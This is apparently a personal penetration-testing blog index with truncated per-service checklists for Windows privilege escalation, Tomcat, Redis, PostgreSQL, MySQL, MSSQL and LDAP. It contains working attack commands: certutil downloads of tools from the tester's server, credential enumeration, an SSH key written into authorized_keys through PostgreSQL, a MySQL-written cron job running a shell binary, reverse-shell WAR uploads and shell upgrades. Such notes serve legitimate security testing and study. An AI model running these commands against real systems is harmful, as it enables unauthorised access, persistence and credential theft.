akde/infosec

Information security is ultimately about managing risk


  • PuT­TY stores ses­sion infor­ma­tion in the registry: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"


  • Pre­pare the own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Pre­pare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Down­load most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip WinPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Powerless Github certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG Github…


  • dir Gen­er­al: Usu­al commands: There­fore: Remem­ber to use dir /R /as /ah -force. tree Start with cre­at­ing a list of all direc­to­ries and files. Down­load it. It’s way eas­i­er to look in a local edi­tor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txtdir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt(Download the files)…


  • General system enumeration Get gen­er­al infor­ma­tion about the OS: systeminfo Get the envi­ron­ment variabes: set Enu­mer­ate cached credentials: cmdkey /list If the cur­rent sys­tem is not known yet, try to deter­mine the ver­sion via one of the fol­low­ing files: Processes enumeration tasklist /Vtasklist /V | find "cmd.exe" // Search for a commandtasklist /V /fi "USERNAME eq NT…


  • After these steps, more things to do: Work with processes For enu­mer­a­tion of process­es, see the Basic Win­dows sys­tem enu­mer­a­tion post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Sus­pend and con­tin­ue a run­ning process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLL’s Show all…


  • Enumeration Mandatory Try to check­out a repo:svn check­out svn://$target Optional Check all branches Go through each revi­sion. (Use grep widely!) Add a new file which could be acces­si­ble in the web.


  • Blue team Use knockd to hide SSH List the arp cache and check if mul­ti­ple IPs routes to the same phys­i­cal adress. Maybe a MitM attack is in progress. More secure development If an attack­er can write files but not direc­to­ries, it could be a good idea to store sen­si­tive files in anoth­er sub­dir. If this…


  • Enumeration Mandatory Check on the HTTP port 8080 if /manager is acces­si­ble (default cre­den­tials: tom­cat / s3cret or admin / admin). If yes, upload a reverse shell WAR file. Optional Try to brute-force with msf> use scanner/http/tomcat_mgr_login.


  • Enumeration Mandatory Try to con­nect:telnet $target 6379 // or: redis-cli -h $target...infoCONFIG GET *system.exec "id" Try to check if you can deter­mine the exis­tence of direc­to­ries.config set dir /var/www/htdocs-ERR Changing directory: No such file or directoryconfig set dir /etc+OK Try to write.  Gen­er­al com­mands:config set dir /var/www/html+OKconfig set dbfilename t.txt+OKset test "hallo"+OKsave+OK Pos­si­ble places:  Upload a…


  • Enumeration Mandatory Option­al


  • Enumeration Optional Brute force with nmap.


  • Enumeration Mandatory Try to connect. Optional Priv­i­lege esca­la­tion with­in PSQL to supe­ruser: https://staaldraad.github.io/post/2020–12-15-cve-2020–25695-postgresql-privesc/ Try to read files: postgres=# CREATE TABLE demo(t text);CREATE TABLEpostgres=# COPY demo from '/etc/passwd';COPY 20postgres=# SELECT * FROM demo; Try to write a file: COPY (select convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';


  • Enumeration Mandatory Try to con­nect with­in a win­dow man­ag­er:rdesktop $target Optional If you have shell acess, try to cre­ate a new user account which is in the group Remote Desk­top Users or add this group to an exist­ing user.


  • Enumeration Mandatory Try to con­nect to the DB. Enu­mer­ate with nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target Optional If you have access to the DB:  Try to read local files:SELECT load_file('/etc/passwd'); Try to write files:CREATE TABLE bbb(content TEXT);INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';


  • Enumeration Mandatory Deter­mine ver­sion:nmap -p 445 --script ms-sql-info $target If cre­den­tials are known:  Try to con­nect to the DB (alter­na­tive: Intel­liJ, …):sqsh -U sa -P $password -S $target:1433 Try to exe­cute com­mands:msf> use auxiliary/admin/mssql/mssql_execmsf> use windows/mssql/mssql_payload If mssql_exec does­n’t work, take care of domain/username and powershell.exe ‑com­mand type system. Optional Brute-force login (e.g. with msf> use…


  • Enumeration Mandatory Check con­fig­u­ra­tion:nmap -sSVC --script rmi-dumpregistry -p 1100 $target Optional Try msf> use scanner/misc/java_rmi_server if class upload is pos­si­ble; if yes, try msf> use multi/misc/java_rmi_server. Try to exploit with BaRMIe.


  • Enumeration Mandatory Check which streams are open:nmap --script rtsp-url-brute -p 554 $target


  • Enumeration Mandatory Enu­mer­ate with ike-scan


  • See the LDAP checklist


  • Enumeration Mandatory Enu­mer­ate with nmap:nmap -n -sV --script "ldap* and not brute" $target Scan with LDAPsearch:ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Con­nect to SSL ports:openssl s_client -connect $target:636 </dev/nullopenssl s_client -connect $target:3269 </dev/null


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';